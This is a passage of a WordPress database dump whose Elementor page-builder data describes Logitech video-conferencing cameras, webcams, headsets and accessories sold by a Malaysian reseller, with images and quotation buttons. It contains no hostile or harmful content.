:2962,\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/03\\/ptz-pro-2-camera-2.jpg\"}],\"thumbnail_size\":\"medium\",\"gallery_columns\":\"2\"},\"elements\":[],\"widgetType\":\"image-gallery\"}],\"isInner\":false},{\"id\":\"bdddfd4\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"94d099e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>OPERATE NEARBY OR FAR AWAY<\\/h3><p>Pan, tilt, and zoom with the hand-held remote to see everything in your conference room, auditorium, classroom, or workspace. The camera can also be operated from a remote location with downloadable software.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d11c4d2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e7bfa7e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"a37df32\",\"elType\":\"widget\",\"settings\":{\"title\":\"ADDITIONAL FEATURES\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"77cdf52\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"ca27297\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"26cf59c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>PREMIUM CAMERA LENS<\\/h4><p>PTZ Pro 2 features a premium camera lens, designed and manufactured by Logitech. Enjoy bright, clear video with accurate color rendition and sharpness, even when zoomed in.<\\/p>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"7587d63\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"b12d91c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>MULTIPLE MOUNTING OPTIONS<\\/h4><p>Configure the conference rooms or event space any way you want: PTZ Pro 2 includes mounting hardware for both tabletop and wall mounting, and features a standard tripod thread for additional flexibility.<\\/p>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5363edd\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"41471da\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>PRESET AND FORGET<\\/h4><p>Compose a wide shot so that everyone is in view. Smoothly switch between people and whiteboards. Perfectly frame each panelist for a broadcast-like experience. PTZ Pro 2 features three camera presets that save pan, tilt, and zoom settings, and smoothly transitions between them at the touch of a button.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b674c12\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"e7fd0e2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>CERTIFIED FOR BUSINESS<\\/h4><p>PTZ Pro 2 offers a plug-and-play USB connection to conference room computers. The camera is certified for Skype for Business, is Cisco WebEx compatible, and offers enhanced integration with BlueJeans, Broadsoft, LifeSize Cloud, Vidyo, and Zoom. If your preferred application can recognize a webcam, you can use it with PTZ Pro 2.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(5662,2965,'_wp_page_template','template-fullwidth.php'),(5663,2965,'_elementor_edit_mode','builder'),(5660,2954,'_oembed_83d882b936f52f426dcff3768e724b35','<iframe width=\"800\" height=\"450\" src=\"https://www.youtube.com/embed/JEoMD9m4K1k?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture\" allowfullscreen></iframe>'),(5661,2954,'_oembed_time_83d882b936f52f426dcff3768e724b35','1551680300'),(5668,2966,'_wp_page_template','template-fullwidth.php'),(5669,2966,'_elementor_edit_mode','builder'),(5670,2966,'_elementor_template_type','post'),(5671,2966,'_elementor_data','[{\"id\":\"71c39ac\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\",\"background_background\":\"classic\"},\"elements\":[{\"id\":\"e477157\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":38.387,\"content_position\":\"center\"},\"elements\":[{\"id\":\"1e2e480\",\"elType\":\"widget\",\"settings\":{\"title\":\"VIDEO CONFERENCING\\u200b\",\"title_color\":\"#000000\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"f051e18\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":61.61},\"elements\":[{\"id\":\"5e28b2d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/conferencecam-group.png\",\"id\":1242},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"aad4243\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"ab857b6\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"b3866d6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>CONFERENCE CAMERAS<\\/h2><p>Bring video collaboration to huddle rooms and large conference rooms with Logitech ConferenceCams.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0326f20\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"56b446e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"963d60b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/conferencecam-group.png\",\"id\":1242}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"eeaf14e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>GROUP<\\/h3><p>Video conferencing for mid to large-sized meeting rooms<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"c880fed\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"},{\"id\":\"7bbbcce\",\"elType\":\"widget\",\"settings\":{\"text\":\"View\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/logitech-group\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"1e67209\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8a768bb\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/rally-system-b2b-pdp.png\",\"id\":1249}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"59f66f3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>Rally<\\/h4><p>Premium Ultra-HD ConferenceCam system with automatic camera control<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"5e9935e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"},{\"id\":\"14b03e7\",\"elType\":\"widget\",\"settings\":{\"text\":\"View\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/logitech-rally\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"1a473ca\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":20},\"elements\":[{\"id\":\"009aa7d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/meetup-conference-cam.png\",\"id\":1316},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6572b52\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>MeetUp<\\/h4><p>All-in-One ConferenceCam with 120\\u00b0 field of view and integrated audio, perfect for small conference and huddle rooms<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"9ea3deb\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"},{\"id\":\"ca314b4\",\"elType\":\"widget\",\"settings\":{\"text\":\"View\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/logitech-meetup\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2042b97\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"2e8e54e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1b201c2\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/conferencecam-connect.png\",\"id\":1318}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"17f6307\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>CONNECT<\\/h3><p>Portable ConferenceCam with Bluetooth speakerphone for the huddle room, home office, and on the go<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"1ed3411\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"},{\"id\":\"f0bb209\",\"elType\":\"widget\",\"settings\":{\"text\":\"View\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/logitech-connect\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"1a08e65\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"93261d2\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/conferencecam-bcc950.png\",\"id\":1319}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"0e23f40\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>BCC950<\\/h3><p>Desktop video conferencing solution for private offices, home offices, and most any semi-private space<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"5fe5fab\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"67ffddd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":20},\"elements\":[{\"id\":\"177327c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ptz-pro-2-camera.png\",\"id\":1321}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"ff04afc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>PTZ PRO 2<\\/h3><p>HD 1080p video camera with enhanced pan\\/tilt and zoom<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e3ff14a\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"},{\"id\":\"666088c\",\"elType\":\"widget\",\"settings\":{\"text\":\"View\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/logitech-ptz-pro-2\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a021238\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"5be05f3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"aea13c1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"790f00c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/rally-camera-e1544499263206.png\",\"id\":1247}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"322d778\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>Rally Camera<\\/h4><p>Premium PTZ camera with Ultra-HD imaging system and automatic camera control<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"5fe363c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"3862603\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"8e81386\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"51d763e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"7410c4e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>VC ROOM SOLUTIONS<\\/h2><p>Complete room solutions from Logitech allow participants to quickly kick off and run a video conference meeting.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"75fc0cb\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"345e12f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b63babc\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"be0e6a0\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/logitech-smartdock-flex.png\",\"id\":1397},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9005f6d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>SMARTDOCK<\\/h3><p>Secure meeting room console designed for Skype Room Systems<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"b9dedfe\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"9b49863\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"433835b\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"ff5eeb4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"a4767f4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>WEBCAMS<\\/h2><p>Designed to work with any VC software, Logitech webcams offer instant collaboration with high-quality HD video.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0f3d021\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"5fe6e79\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b4e24a2\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/briopictograms.png\",\"id\":1332}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9a3535d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>BRIO<\\/h3><p>4K Ultra HD webcam with RightLight\\u2122 3 with HDR<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"fba2ea6\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"c05d87c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"12d5f47\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/c930e-webcam.png\",\"id\":1334}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"91bee63\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Logitech C930e<\\/h3><p>Business webcam with a wide field of view and HD digital zoom<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e4e520f\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"c71a30b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f62006e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/c925e-webcam.png\",\"id\":1336}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"a94baf9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Logitech C925e<\\/h3><p>Affordable 1080p HD webcam with integrated privacy shade<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"086da3d\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ae10c21\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"93d444d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"5ab9b49\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"858059a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/b525-pdp-2017-refresh.png\",\"id\":1354}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"ca4407c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Logitech B525<\\/h3><p>Ideal for on-the-go professionals with a compact, foldable, 360\\u00b0 swivel design<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"009af69\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"fe5d066\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"9072abf\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"6c257c5\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"c2db587\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>HEADSETS<\\/h2><p>Stylish and affordable, Logitech headsets are designed for long-lasting comfort to make every call more productive.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"aea83c8\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"a1561a0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"5e39286\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ece341e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/h570e-headset.png\",\"id\":1364}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"e3497b4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Logitech H570e Headset<\\/h3><p>Comfortable, affordable, and built to last<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"785345f\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b698d09\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"16f5dd5\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c4a4a72\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"6b09cb7\",\"elType\":\"widget\",\"settings\":{\"title\":\"VIDEO COLLABORATION ACCESSORIES\",\"align\":\"center\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f31cb09\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"12ed18d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"38d7d0f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/smartdock-extender-box.png\",\"id\":1386}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9cbda85\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>SMARTDOCK EXTENDER BOX<\\/h3><p>Connectivity options for Logitech SmartDock<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f575023\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"08edb2e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"85c2829\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/logitech-screen-share.png\",\"id\":1391}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"f3f660b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Logitech Screen Share<\\/h3><p>A fast, familiar, and affordable way to share content in the conference room and into online meetings.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"77dadd4\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b20ef35\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3211191\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/group-expansion-microphones.png\",\"id\":1392}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"2a65808\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>GROUP EXPANSION MICS<\\/h3><p>Add-on mics for larger groups<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6a71d0d\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ac7c83c\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"f6834a7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"13a33a9\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/logitech-smartdock-flex.png\",\"id\":1397}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5b6e717\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Logitech SmartDock Flex<\\/h3><p>Expansion Kit for Logitech SmartDock<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"5014200\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"366eb59\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dc59d5f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/group-15m-extended-cable.png\",\"id\":1401}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"e222e61\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>GROUP 15M EXTENDED CABLE<\\/h3><p>15 meter cable for video conferences in larger rooms<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"b6bbdef\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get 